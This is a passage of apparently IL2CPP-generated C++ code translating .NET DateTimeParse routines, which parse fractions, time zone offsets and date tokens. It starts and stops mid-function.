* L_38 = ___str0; String_t* L_39 = L_38->get_Value_0(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_40 = ___str0; int32_t L_41 = L_40->get_Index_1(); Il2CppChar L_42 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_39, L_41, /*hidden argument*/NULL); L_37->set_m_current_3(L_42); } IL_009b: { return (bool)1; } } // System.Boolean System.DateTimeParse::GetTimeZoneName(System.__DTString&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetTimeZoneName_m97D930C9A69DF1FF85F761CEBB5025A04360FEAD (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetTimeZoneName_m97D930C9A69DF1FF85F761CEBB5025A04360FEAD_MetadataUsageId); s_Il2CppMethodInitialized = true; } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_1 = DateTimeParse_MatchWord_mC620454975484A06318A4488BA503D763B98EE34((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_0, _stringLiteralD84234CE9F95C2DF9A9CB91648DC0629D7B55A78, /*hidden argument*/NULL); if (!L_1) { goto IL_000f; } } { return (bool)1; } IL_000f: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_2 = ___str0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_3 = DateTimeParse_MatchWord_mC620454975484A06318A4488BA503D763B98EE34((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_2, _stringLiteral909F99A779ADB66A76FC53AB56C7DD1CAF35D0FD, /*hidden argument*/NULL); if (!L_3) { goto IL_001e; } } { return (bool)1; } IL_001e: { return (bool)0; } } // System.Boolean System.DateTimeParse::IsDigit(System.Char) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_IsDigit_mCC840BC9EC5E157F967F148BC12F6A815E75B74A (Il2CppChar ___ch0, const RuntimeMethod* method) { { Il2CppChar L_0 = ___ch0; if ((((int32_t)L_0) < ((int32_t)((int32_t)48)))) { goto IL_000e; } } { Il2CppChar L_1 = ___ch0; return (bool)((((int32_t)((((int32_t)L_1) > ((int32_t)((int32_t)57)))? 1 : 0)) == ((int32_t)0))? 1 : 0); } IL_000e: { return (bool)0; } } // System.Boolean System.DateTimeParse::ParseFraction(System.__DTString&,System.Double&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseFraction_m50CDFE8D39EA1BF918ECEBE6E31E099B80F17B55 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, double* ___result1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_ParseFraction_m50CDFE8D39EA1BF918ECEBE6E31E099B80F17B55_MetadataUsageId); s_Il2CppMethodInitialized = true; } double V_0 = 0.0; int32_t V_1 = 0; Il2CppChar V_2 = 0x0; { double* L_0 = ___result1; *((double*)L_0) = (double)(0.0); V_0 = (0.1); V_1 = 0; goto IL_0035; } IL_0019: { double* L_1 = ___result1; double* L_2 = ___result1; double L_3 = *((double*)L_2); Il2CppChar L_4 = V_2; double L_5 = V_0; *((double*)L_1) = (double)((double)il2cpp_codegen_add((double)L_3, (double)((double)il2cpp_codegen_multiply((double)(((double)((double)((int32_t)il2cpp_codegen_subtract((int32_t)L_4, (int32_t)((int32_t)48)))))), (double)L_5)))); double L_6 = V_0; V_0 = ((double)il2cpp_codegen_multiply((double)L_6, (double)(0.1))); int32_t L_7 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_7, (int32_t)1)); } IL_0035: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_8 = ___str0; bool L_9 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_8, /*hidden argument*/NULL); if (!L_9) { goto IL_004c; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_10 = ___str0; Il2CppChar L_11 = L_10->get_m_current_3(); Il2CppChar L_12 = L_11; V_2 = L_12; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_13 = DateTimeParse_IsDigit_mCC840BC9EC5E157F967F148BC12F6A815E75B74A(L_12, /*hidden argument*/NULL); if (L_13) { goto IL_0019; } } IL_004c: { int32_t L_14 = V_1; return (bool)((((int32_t)L_14) > ((int32_t)0))? 1 : 0); } } // System.Boolean System.DateTimeParse::ParseTimeZone(System.__DTString&,System.TimeSpan&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseTimeZone_mA74CA520A5B9C842CCD4E602AC325C43CFF7C0DF (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * ___result1, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D V_2; memset(&V_2, 0, sizeof(V_2)); Il2CppChar V_3 = 0x0; int32_t V_4 = 0; int32_t V_5 = 0; { V_0 = 0; V_1 = 0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_1 = __DTString_GetSubString_m699C79DE88DFBC0BDD9F85C2CDC155ABB1473DC4((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_0, /*hidden argument*/NULL); V_2 = L_1; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_2 = V_2; int32_t L_3 = L_2.get_length_2(); if ((((int32_t)L_3) == ((int32_t)1))) { goto IL_0016; } } { return (bool)0; } IL_0016: { Il2CppChar L_4 = DTSubString_get_Item_mD569E347AE9009D19F72CF9A6AD2B202C9133F99((DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D *)(&V_2), 0, /*hidden argument*/NULL); V_3 = L_4; Il2CppChar L_5 = V_3; if ((((int32_t)L_5) == ((int32_t)((int32_t)43)))) { goto IL_002b; } } { Il2CppChar L_6 = V_3; if ((((int32_t)L_6) == ((int32_t)((int32_t)45)))) { goto IL_002b; } } { return (bool)0; } IL_002b: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_7 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_8 = V_2; __DTString_ConsumeSubString_mDFAADAA4A5FC450399046DB04CE10A4503961FAA((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_7, L_8, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_9 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_10 = __DTString_GetSubString_m699C79DE88DFBC0BDD9F85C2CDC155ABB1473DC4((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_9, /*hidden argument*/NULL); V_2 = L_10; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_11 = V_2; int32_t L_12 = L_11.get_type_3(); if ((((int32_t)L_12) == ((int32_t)2))) { goto IL_0044; } } { return (bool)0; } IL_0044: { DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_13 = V_2; int32_t L_14 = L_13.get_value_4(); V_4 = L_14; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_15 = V_2; int32_t L_16 = L_15.get_length_2(); V_5 = L_16; int32_t L_17 = V_5; if ((((int32_t)L_17) == ((int32_t)1))) { goto IL_005e; } } { int32_t L_18 = V_5; if ((!(((uint32_t)L_18) == ((uint32_t)2)))) { goto IL_00bf; } } IL_005e: { int32_t L_19 = V_4; V_0 = L_19; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_20 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_21 = V_2; __DTString_ConsumeSubString_mDFAADAA4A5FC450399046DB04CE10A4503961FAA((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_20, L_21, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_22 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_23 = __DTString_GetSubString_m699C79DE88DFBC0BDD9F85C2CDC155ABB1473DC4((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_22, /*hidden argument*/NULL); V_2 = L_23; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_24 = V_2; int32_t L_25 = L_24.get_length_2(); if ((!(((uint32_t)L_25) == ((uint32_t)1)))) { goto IL_00e0; } } { Il2CppChar L_26 = DTSubString_get_Item_mD569E347AE9009D19F72CF9A6AD2B202C9133F99((DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D *)(&V_2), 0, /*hidden argument*/NULL); if ((!(((uint32_t)L_26) == ((uint32_t)((int32_t)58))))) { goto IL_00e0; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_27 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_28 = V_2; __DTString_ConsumeSubString_mDFAADAA4A5FC450399046DB04CE10A4503961FAA((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_27, L_28, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_29 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_30 = __DTString_GetSubString_m699C79DE88DFBC0BDD9F85C2CDC155ABB1473DC4((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_29, /*hidden argument*/NULL); V_2 = L_30; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_31 = V_2; int32_t L_32 = L_31.get_type_3(); if ((!(((uint32_t)L_32) == ((uint32_t)2)))) { goto IL_00ad; } } { DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_33 = V_2; int32_t L_34 = L_33.get_length_2(); if ((((int32_t)L_34) < ((int32_t)1))) { goto IL_00ad; } } { DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_35 = V_2; int32_t L_36 = L_35.get_length_2(); if ((((int32_t)L_36) <= ((int32_t)2))) { goto IL_00af; } } IL_00ad: { return (bool)0; } IL_00af: { DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_37 = V_2; int32_t L_38 = L_37.get_value_4(); V_1 = L_38; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_39 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_40 = V_2; __DTString_ConsumeSubString_mDFAADAA4A5FC450399046DB04CE10A4503961FAA((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_39, L_40, /*hidden argument*/NULL); goto IL_00e0; } IL_00bf: { int32_t L_41 = V_5; if ((((int32_t)L_41) == ((int32_t)3))) { goto IL_00c9; } } { int32_t L_42 = V_5; if ((!(((uint32_t)L_42) == ((uint32_t)4)))) { goto IL_00de; } } IL_00c9: { int32_t L_43 = V_4; V_0 = ((int32_t)((int32_t)L_43/(int32_t)((int32_t)100))); int32_t L_44 = V_4; V_1 = ((int32_t)((int32_t)L_44%(int32_t)((int32_t)100))); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_45 = ___str0; DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D L_46 = V_2; __DTString_ConsumeSubString_mDFAADAA4A5FC450399046DB04CE10A4503961FAA((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_45, L_46, /*hidden argument*/NULL); goto IL_00e0; } IL_00de: { return (bool)0; } IL_00e0: { int32_t L_47 = V_1; if ((((int32_t)L_47) < ((int32_t)0))) { goto IL_00e9; } } { int32_t L_48 = V_1; if ((((int32_t)L_48) < ((int32_t)((int32_t)60)))) { goto IL_00eb; } } IL_00e9: { return (bool)0; } IL_00eb: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_49 = ___result1; int32_t L_50 = V_0; int32_t L_51 = V_1; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_52; memset(&L_52, 0, sizeof(L_52)); TimeSpan__ctor_m44268277AFF84DEF6CA3442907CE8116A982FB87((&L_52), L_50, L_51, 0, /*hidden argument*/NULL); *(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_49 = L_52; Il2CppChar L_53 = V_3; if ((!(((uint32_t)L_53) == ((uint32_t)((int32_t)45))))) { goto IL_010a; } } { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_54 = ___result1; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_55 = ___result1; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_56 = TimeSpan_Negate_m0DC5231DD5489EB3A8A7AE9AC30F83CBD3987C33((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_55, /*hidden argument*/NULL); *(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_54 = L_56; } IL_010a: { return (bool)1; } } // System.Boolean System.DateTimeParse::HandleTimeZone(System.__DTString&,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_HandleTimeZone_mA7F93EC5CC7B120970BA0CF78CA0CB5803BEB4CD (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_HandleTimeZone_mA7F93EC5CC7B120970BA0CF78CA0CB5803BEB4CD_MetadataUsageId); s_Il2CppMethodInitialized = true; } Il2CppChar V_0 = 0x0; int32_t V_1 = 0; { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___str0; int32_t L_1 = L_0->get_Index_1(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_2 = ___str0; int32_t L_3 = L_2->get_len_2(); if ((((int32_t)L_1) >= ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_3, (int32_t)1))))) { goto IL_00b9; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_4 = ___str0; String_t* L_5 = L_4->get_Value_0(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_6 = ___str0; int32_t L_7 = L_6->get_Index_1(); Il2CppChar L_8 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_5, L_7, /*hidden argument*/NULL); V_0 = L_8; V_1 = 0; goto IL_0041; } IL_0029: { int32_t L_9 = V_1; V_1 = ((int32_t)il2cpp_codegen_add((int32_t)L_9, (int32_t)1)); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_10 = ___str0; String_t* L_11 = L_10->get_Value_0(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_12 = ___str0; int32_t L_13 = L_12->get_Index_1(); int32_t L_14 = V_1; Il2CppChar L_15 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_11, ((int32_t)il2cpp_codegen_add((int32_t)L_13, (int32_t)L_14)), /*hidden argument*/NULL); V_0 = L_15; } IL_0041: { Il2CppChar L_16 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var); bool L_17 = Char_IsWhiteSpace_m8AE1C4157A1E1D8F5022630F4229AB26223BDC6B(L_16, /*hidden argument*/NULL); if (!L_17) { goto IL_005b; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_18 = ___str0; int32_t L_19 = L_18->get_Index_1(); int32_t L_20 = V_1; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_21 = ___str0; int32_t L_22 = L_21->get_len_2(); if ((((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_19, (int32_t)L_20))) < ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_22, (int32_t)1))))) { goto IL_0029; } } IL_005b: { Il2CppChar L_23 = V_0; if ((((int32_t)L_23) == ((int32_t)((int32_t)43)))) { goto IL_0065; } } { Il2CppChar L_24 = V_0; if ((!(((uint32_t)L_24) == ((uint32_t)((int32_t)45))))) { goto IL_00b9; } } IL_0065: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_25 = ___str0; int32_t* L_26 = L_25->get_address_of_Index_1(); int32_t* L_27 = L_26; int32_t L_28 = *((int32_t*)L_27); int32_t L_29 = V_1; *((int32_t*)L_27) = (int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_28, (int32_t)L_29)); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_30 = ___result1; int32_t L_31 = L_30->get_flags_8(); if (!((int32_t)((int32_t)L_31&(int32_t)((int32_t)256)))) { goto IL_008d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_32 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_32, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_008d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_33 = ___result1; int32_t* L_34 = L_33->get_address_of_flags_8(); int32_t* L_35 = L_34; int32_t L_36 = *((int32_t*)L_35); *((int32_t*)L_35) = (int32_t)((int32_t)((int32_t)L_36|(int32_t)((int32_t)256))); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_37 = ___str0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_38 = ___result1; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_39 = L_38->get_address_of_timeZoneOffset_9(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_40 = DateTimeParse_ParseTimeZone_mA74CA520A5B9C842CCD4E602AC325C43CFF7C0DF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_37, (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_39, /*hidden argument*/NULL); if (L_40) { goto IL_00b9; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_41 = ___result1; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_41, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00b9: { return (bool)1; } } // System.Boolean System.DateTimeParse::Lex(System.DateTimeParse/DS,System.__DTString&,System.DateTimeToken&,System.DateTimeRawInfo&,System.DateTimeResult&,System.Globalization.DateTimeFormatInfo&,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_Lex_mE8D565FF95FF14B4575857D9DF4056AC92AB4622 (int32_t ___dps0, __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str1, DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * ___dtok2, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw3, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result4, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** ___dtfi5, int32_t ___styles6, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_Lex_mE8D565FF95FF14B4575857D9DF4056AC92AB4622_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; Il2CppChar V_3 = 0x0; int32_t V_4 = 0; int32_t V_5 = 0; ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * V_6 = NULL; bool V_7 = false; int32_t V_8 = 0; Exception_t * __last_unhandled_exception = 0; NO_UNUSED_WARNING (__last_unhandled_exception); Exception_t * __exception_local = 0; NO_UNUSED_WARNING (__exception_local); int32_t __leave_target = -1; NO_UNUSED_WARNING (__leave_target); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * G_B42_0 = NULL; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * G_B41_0 = NULL; int32_t G_B43_0 = 0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * G_B43_1 = NULL; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * G_B88_0 = NULL; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * G_B87_0 = NULL; int32_t G_B89_0 = 0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * G_B89_1 = NULL; { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_0 = ___dtok2; L_0->set_dtt_0(((int32_t)18)); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_1 = ___str1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_2 = ___dtfi5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_3 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_2); __DTString_GetRegularToken_mD79E9337E33F2F9535DD89437EEDC2AF3F5A0B39((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_1, (int32_t*)(&V_0), (int32_t*)(&V_1), L_3, /*hidden argument*/NULL); int32_t L_4 = V_0; switch (((int32_t)il2cpp_codegen_subtract((int32_t)L_4, (int32_t)1))) { case 0: { goto IL_005e; } case 1: { goto IL_005e; } case 2: { goto IL_0993; } case 3: { goto IL_0993; } case 4: { goto IL_077b; } case 5: { goto IL_0987; } case 6: { goto IL_074e; } case 7: { goto IL_092d; } case 8: { goto IL_0878; } case 9: { goto IL_0a4d; } case 10: { goto IL_09b8; } case 11: { goto IL_05e3; } case 12: { goto IL_08a7; } case 13: { goto IL_08ea; } case 14: { goto IL_0a4d; } } } { goto IL_0a4d; } IL_005e: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_5 = ___raw3; int32_t L_6 = L_5->get_numCount_1(); if ((((int32_t)L_6) == ((int32_t)3))) { goto IL_006b; } } { int32_t L_7 = V_1; if ((!(((uint32_t)L_7) == ((uint32_t)(-1))))) { goto IL_007b; } } IL_006b: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_8 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_8, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_007b: { int32_t L_9 = ___dps0; if ((!(((uint32_t)L_9) == ((uint32_t)((int32_t)19))))) { goto IL_00b2; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_10 = ___str1; int32_t L_11 = L_10->get_Index_1(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_12 = ___str1; int32_t L_13 = L_12->get_len_2(); if ((((int32_t)L_11) >= ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_13, (int32_t)1))))) { goto IL_00b2; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_14 = ___str1; String_t* L_15 = L_14->get_Value_0(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_16 = ___str1; int32_t L_17 = L_16->get_Index_1(); Il2CppChar L_18 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_15, L_17, /*hidden argument*/NULL); if ((!(((uint32_t)L_18) == ((uint32_t)((int32_t)46))))) { goto IL_00b2; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_19 = ___str1; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_20 = ___raw3; double* L_21 = L_20->get_address_of_fraction_7(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTimeParse_ParseFraction_m50CDFE8D39EA1BF918ECEBE6E31E099B80F17B55((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_19, (double*)L_21, /*hidden argument*/NULL); } IL_00b2: { int32_t L_22 = ___dps0; if ((((int32_t)L_22) == ((int32_t)((int32_t)19)))) { goto IL_00bc; } } { int32_t L_23 = ___dps0; if ((!(((uint32_t)L_23) == ((uint32_t)((int32_t)18))))) { goto IL_00d8; } } IL_00bc: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_24 = ___str1; int32_t L_25 = L_24->get_Index_1(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_26 = ___str1; int32_t L_27 = L_26->get_len_2(); if ((((int32_t)L_25) >= ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_27, (int32_t)1))))) { goto IL_00d8; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_28 = ___str1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_29 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_30 = DateTimeParse_HandleTimeZone_mA7F93EC5CC7B120970BA0CF78CA0CB5803BEB4CD((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_28, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_29, /*hidden argument*/NULL); if (L_30) { goto IL_00d8; } } { return (bool)0; } IL_00d8: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_31 = ___dtok2; int32_t L_32 = V_1; L_31->set_num_2(L_32); int32_t L_33 = V_0; if ((!(((uint32_t)L_33) == ((uint32_t)2)))) { goto IL_02ed; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_34 = ___raw3; int32_t L_35 = L_34->get_year_3(); if ((!(((uint32_t)L_35) == ((uint32_t)(-1))))) { goto IL_02dd; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_36 = ___raw3; int32_t L_37 = V_1; L_36->set_year_3(L_37); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_38 = ___str1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_39 = ___dtfi5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_40 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_39); int32_t L_41 = __DTString_GetSeparatorToken_m2F4CE10AC9C39A5380D3DD5344B81F79C7006EF1((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_38, L_40, (int32_t*)(&V_2), (Il2CppChar*)(&V_3), /*hidden argument*/NULL); int32_t L_42 = L_41; V_4 = L_42; V_5 = L_42; int32_t L_43 = V_5; if ((((int32_t)L_43) > ((int32_t)((int32_t)1792)))) { goto IL_016f; } } { int32_t L_44 = V_5; if ((((int32_t)L_44) > ((int32_t)((int32_t)1024)))) { goto IL_0146; } } { int32_t L_45 = V_5; if ((((int32_t)L_45) == ((int32_t)((int32_t)512)))) { goto IL_01e4; } } { int32_t L_46 = V_5; if ((((int32_t)L_46) == ((int32_t)((int32_t)768)))) { goto IL_022d; } } { int32_t L_47 = V_5; if ((((int32_t)L_47) == ((int32_t)((int32_t)1024)))) { goto IL_01f1; } } { goto IL_02cb; } IL_0146: { int32_t L_48 = V_5; if ((((int32_t)L_48) == ((int32_t)((int32_t)1280)))) { goto 